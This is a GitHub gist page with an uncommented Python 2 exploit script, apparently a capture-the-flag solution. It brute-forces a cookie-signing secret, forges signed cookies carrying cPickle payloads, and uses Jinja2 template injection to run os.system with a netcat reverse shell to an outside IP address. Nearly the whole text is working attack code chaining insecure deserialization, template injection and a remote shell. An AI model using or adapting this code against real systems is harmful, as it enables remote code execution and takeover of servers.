Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
# class Target(object):
# def __reduce__(self):
# return (__import__, ('json',))
class Target(object):
def __reduce__(self):
return (repr, ('This is marked',))
class Import(object):
def __reduce__(self):
return (__import__, ('flask',))
shell = """
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 | /bin/sh | nc 139.59.244.42 31338') }}
{% endif %}
{% endfor %}
"""
class Execute(object):
def __reduce__(self):
return (flask.render_template_string, (shell,))
local = 'http://localhost:8888/'
remote = 'http://47.75.151.118:9999/'
def bruteforce():
server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
_hash, data = server_cookie.split('!')
charset = string.ascii_letters + string.digits
# reverse = charset[::-1]
for c in charset:
for k in charset:
for z in charset:
for x in charset:
secret = c + k + z + x
print '[!] Try:',secret
if hashlib.sha256(data + secret).hexdigest() == _hash:
return secret
def cretae_cookie(data,secret):
return '%s!%s' % (hashlib.sha256(data + secret).hexdigest(),data)
# secret = bruteforce()
# print 'Secret:',secret
secret = 'hitb'
local = remote
data = b64encode(cPickle.dumps(Import()))
cookie = {'location' : cretae_cookie(data,secret)}
print cookie
requests.get(local,cookies=cookie)
cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
print cookie
req = requests.get(local,cookies=cookie)
print req.text
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment